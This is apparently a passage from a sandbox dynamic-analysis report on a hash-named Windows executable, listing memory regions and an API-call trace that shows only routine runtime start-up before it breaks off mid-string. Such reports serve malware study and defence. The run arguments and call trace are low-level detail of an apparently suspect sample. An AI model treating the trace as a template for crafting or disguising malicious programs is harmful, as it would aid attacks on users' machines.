"\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") Region: id = 926 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 927 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 928 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 929 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 930 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 931 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 932 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 933 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 934 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 935 start_va = 0x1a0000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 936 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 937 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 938 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 939 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 940 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 941 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 942 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 943 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 944 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 945 start_va = 0x2540000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 946 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 947 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 948 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 949 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 950 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 951 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 952 start_va = 0x2f0000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 953 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 954 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 955 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 956 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 957 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 958 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 959 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 960 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 961 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 962 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 963 start_va = 0x210000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 964 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 965 start_va = 0x2790000 end_va = 0x2917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 966 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 967 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 968 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 969 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 970 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 971 start_va = 0x2920000 end_va = 0x2aa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002920000" filename = "" Region: id = 972 start_va = 0x2ab0000 end_va = 0x3eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ab0000" filename = "" Region: id = 973 start_va = 0x3eb0000 end_va = 0x402ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 974 start_va = 0x2540000 end_va = 0x25d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 975 start_va = 0x2690000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 976 start_va = 0x4030000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004030000" filename = "" Region: id = 977 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 978 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 979 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 980 start_va = 0x3eb0000 end_va = 0x3fcafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 981 start_va = 0x4020000 end_va = 0x402ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 982 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 983 start_va = 0x4030000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 984 start_va = 0x4030000 end_va = 0x410efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004030000" filename = "" Region: id = 985 start_va = 0x4110000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 986 start_va = 0x739b0000 end_va = 0x739c2fff monitored = 0 entry_point = 0x739b1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 987 start_va = 0x210000 end_va = 0x212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 988 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 62 os_tid = 0xedc [0100.559] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xa317b7a0, dwHighDateTime=0x1d8a8d3)) [0100.559] GetCurrentProcessId () returned 0xed8 [0100.559] GetCurrentThreadId () returned 0xedc [0100.559] GetTickCount () returned 0x13af694 [0100.559] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=2075968850781) returned 1 [0100.560] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ed70)) [0100.560] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.560] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x4020000 [0100.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0100.562] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0100.562] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0100.562] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0100.562] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0100.564] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x214) returned 0x40207d0 [0100.564] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0100.564] GetCurrentThreadId () returned 0xedc [0100.564] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a656, hStdOutput=0x49a98f, hStdError=0x40207d0)) [0100.564] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x800) returned 0x40209f0 [0100.565] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0100.565] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.565] SetHandleCount (uNumber=0x20) returned 0x20 [0100.565] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask" [0100.565] GetEnvironmentStringsW () returned 0x26a1f50* [0100.565] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x0, Size=0xb0e) returned 0x40211f8 [0100.566] FreeEnvironmentStringsW (penv=0x26a1f50) returned 1 [0100.566] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x0, Size=0x116) returned 0x4021d10 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x98) returned 0x4021e30 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x3e) returned 0x4021ed0 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x56) returned 0x4021f18 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x6e) returned 0x4021f78 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x78) returned 0x4021ff0 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x62) returned 0x4022070 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x30) returned 0x40220e0 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x48) returned 0x4022118 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x28) returned 0x4022168 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x1a) returned 0x4022198 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x34) returned 0x40221c0 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x5c) returned 0x4022200 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x32) returned 0x4022268 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x2e) returned 0x40222a8 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x1c) returned 0x40222e0 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x12a) returned 0x4022308 [0100.566] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x7c) returned 0x4022440 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x36) returned 0x40224c8 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x3a) returned 0x4022508 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x90) returned 0x4022550 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x24) returned 0x40225e8 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x30) returned 0x4022618 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x36) returned 0x4022650 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x48) returned 0x4022690 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x52) returned 0x40226e0 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x3c) returned 0x4022740 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0xd6) returned 0x4022788 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x2e) returned 0x4022868 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x1e) returned 0x40228a0 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x2c) returned 0x40228c8 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x54) returned 0x4022900 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x52) returned 0x4022960 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x2c) returned 0x40229c0 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x26) returned 0x40229f8 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x3e) returned 0x4022a28 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x24) returned 0x4022a70 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x30) returned 0x4022aa0 [0100.567] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x8c) returned 0x4022ad8 [0100.578] HeapFree (in: hHeap=0x4020000, dwFlags=0x0, lpMem=0x40211f8 | out: hHeap=0x4020000) returned 1 [0100.579] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0100.579] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x80) returned 0x4022b70 [0100.579] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x8, Size=0x800) returned 0x40211f8 [0100.579] GetLastError () returned 0x0 [0100.579] SetLastError (dwErrCode=0x0) [0100.579] GetLastError () returned 0x0 [0100.579] SetLastError (dwErrCode=0x0) [0100.579] GetLastError () returned 0x0 [0100.579] SetLastError (dwErrCode=0x0) [0100.579] GetACP () returned 0x4e4 [0100.579] RtlAllocateHeap (HeapHandle=0x4020000, Flags=0x0, Size=0x220) returned 0x4021a00 [0100.579] GetLastError () returned 0x0 [0100.579] SetLastError (dwErrCode=0x0) [0100.579] IsValidCodePage (CodePage=0x4e4) returned 1 [0100.579] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0100.579] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0100.580] GetLastError () returned 0x0 [0100.580] SetLastError (dwErrCode=0x0) [0100.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0100.580] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0100.580] GetLastError () returned 0x0 [0100.580] SetLastError (dwErrCode=0x0) [0100.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ椯跕ᨤJĀ") returned 256 [0100.580] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ椯跕ᨤJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0100.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ椯跕ᨤJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0100.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 